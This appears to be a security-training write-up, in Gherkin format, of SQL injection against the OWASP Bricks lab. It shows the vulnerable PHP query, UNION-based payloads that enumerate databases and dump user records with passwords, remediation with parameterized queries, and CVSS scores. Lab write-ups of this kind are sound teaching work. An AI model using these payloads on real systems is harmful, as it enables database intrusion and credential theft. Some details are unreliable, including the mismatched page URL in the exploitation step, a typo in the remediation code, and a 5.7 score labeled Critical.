## Version 1.4.1
## language: en

Feature:
  TOE:
    Bricks Content 2
  Location:
    http://localhost/bricks/content-2/index.php - name (header)
  CWE:
    CWE-0564: Allows remote attackers to perform arbitrary operations
    via unspecified vectors
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Detect and exploit vuln Insecure SQL query input
  Recommendation:
    Use parameterized queries with known tools

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows 10 Pro  | 2024          |
    | Google Chrome   | 87.0.4280.88  |
    | WAMPSERVER      | 3.2.3         |
    | PHP             | 5.6.40        |
  TOE information:
    Given I set up the OWASP Bricks in my PC
    Then I entered a PHP site which uses SQL requests and database MySql
    And I get access to http://localhost/bricks/

  Scenario: Normal use case
    Given I access to http://localhost/bricks/
    When I click on "Content pages" from the "bricks" dropdown menu
    Then I access to http://localhost/bricks/content-pages.html
    And I click in "Content #2"
    Then I access to http://localhost/bricks/content-2/index.php?user=harry
    And I can see user data with name "harry"

  Scenario: Static detection
    When I open network requests of the page from the browser inspector
    Then I can see that the page uses the GET method from "index.php" to load
    And as I have the site running locally in my PC
    Then I can see the following GET method from www/bricks/content-2/index.php
    """
    $user=$_GET['user'];
    if(isset($_GET['user'])) {
      $sql = "SELECT * FROM users WHERE name='$user'";
      $result=mysql_query($sql);
    } else {
     header("Location: index.php?user=harry");
     exit;
    }
    """
    Given that the method doesn't use parameterized queries
    Then I can detect a SQLi vulnerability to get user data

  Scenario: Dynamic detection
    Given I access to http://localhost/bricks/content-2/index.php?user=harry
    And knowing that the database is MySql
    When I change the "name" parameter value in the url to
    """
    '
    """
    Then OWASP shows me the sql instruction with which I try to get user data
    And OWASP shows me a SQL syntax error too
    Then I can conclude that the "name" parameter has SQLi vulnerability
    And this can be seen in [evidence](img1.png)

  Scenario: Exploitation
    Given I access to http://localhost/bricks/content-1/index.php?id=0
    When I write the following SQL syntax as value of "name" parameter
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 1),2,3,4,5,6,7,'
    """
    Then I can see the database name as can see in [evidence](img2.png)
    When I write the following SQL syntax as value of "name" parameter
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 1),(select GROUP_CONCAT(table_name)
       from information_schema.tables WHERE table_schema='bricks'),3,4,5,
       6,7,8 '
    """
    Then I can see that the database "bricks" has no tables
    And this can be seen in [evidence](img3.png)
    Then I try to find another database
    And I write the following SQL syntax as value of "name" parameter
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 2),2,3,4,5,6,7,8 '
    """
    Then I can see the name of another database
    And this can be seen in [evidence](img4.png)
    When I write the following SQL syntax as value of "name" parameter
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 2),(select GROUP_CONCAT(table_name)
       from information_schema.tables WHERE table_schema='inject'),3,4,5,
       6,7,8 '
    """
    Then I can see that the database "inject" has one only table "users"
    And this can be seen in [evidence](img5.png)
    When I write the following SQL syntax as value of "name" parameter
    """
    ' union select (select schema_name from information_schema.schemata
       limit 1 offset 2),(select GROUP_CONCAT(table_name)
       from information_schema.tables WHERE table_schema='inject'),
       (select GROUP_CONCAT(column_name) from information_schema.columns
       where table_name='users'),4,5,6,7,8 '
    """
    Then I can see the attributes from users table
    And this can be seen in [evidence](img6.png)
    When I write the following SQL syntax as value of "name" parameter
    """
    ' union select (select concat(idusers, ",", name, ",", email, ",",
       password, ",", ua, ",", ref, ",", host, ",", lang) from users
       limit 1 offset 1),(select GROUP_CONCAT(table_name)
       from information_schema.tables WHERE table_schema='inject'),
       (select GROUP_CONCAT(column_name) from information_schema.columns
       where table_name='users'),4,5,6,7,'
    """
    Then I can see the data of the first record of the users table
    And this can be seen in [evidence](img7.png)

  Scenario: Remediation
    When I use parameterized queries in the back
    Then the program can succesfully avoid most of the known SQLi
    Given I know that the site is PHP and database is MySql
    Then I can use MySqli as tools of parameterized queries
    And I can seen a example in the following line
    """
    ...
    $sql = "SELECT email FROM users WHERE username = ? AND password = ?"
    $sqlQuery = mysqli_prepare($connection, $sql);
    $result = mysqli_stmt_bind_param($sqlQuery, "ss", $userValue, $passValue);
    $result = msqli_stmt_execute($sqlQuery);

    if ($result) {
      $result = mysqli_stmt_bind_result($sqlQuery, $email);
      if(mysqli_stmt_fetch($sqlQuery)) {
        echo $email;
      }
    }
    ...
    """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.0/10 (Critical) - AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.6/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.7/10 (Critical) - CR:L/IR:L/MC:L/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2021-03-15
